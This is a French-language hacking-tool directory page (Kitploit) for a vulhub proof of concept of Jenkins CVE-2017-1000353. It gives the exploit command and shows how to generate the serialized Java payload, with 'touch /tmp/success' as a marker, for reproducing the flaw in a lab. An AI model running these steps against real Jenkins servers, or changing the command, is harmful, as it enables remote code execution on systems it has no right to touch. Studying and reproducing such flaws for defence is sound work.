Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-1000353 — jenkins CVE-2017-1000353 POC | Kitploit
Outils/GitHubGitHub/vulhub/cve-2017-1000353
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

Voir le dépôt
5762il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC CVE-2017-1000353

Comment reproduire la vulnérabilité CVE-2017-1000353 de Jenkins ?

Clonez ce dépôt et utilisez le payload pré-construit jenkins_poc.ser avec la commande suivante :

root@kitploit:~
python exploit.py http://your-ip:8080 jenkins_poc.ser

Ensuite, la commande touch /tmp/success sera exécutée.

Prérequis de version Java

Important : La génération du payload dépend de la version de Java. Le test a été réalisé avec succès avec openjdk:8u292. D'autres versions de Java peuvent ne pas fonctionner correctement pour la génération du payload et l'exploitation.

Comment générer le payload jenkins_poc.ser ?

Téléchargez CVE-2017-1000353-SNAPSHOT-all.jar.

root@kitploit:~
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Si vous utilisez Docker, vous pouvez utiliser la commande suivante pour assurer la compatibilité :

root@kitploit:~
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Référence

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

Télécharger l’outil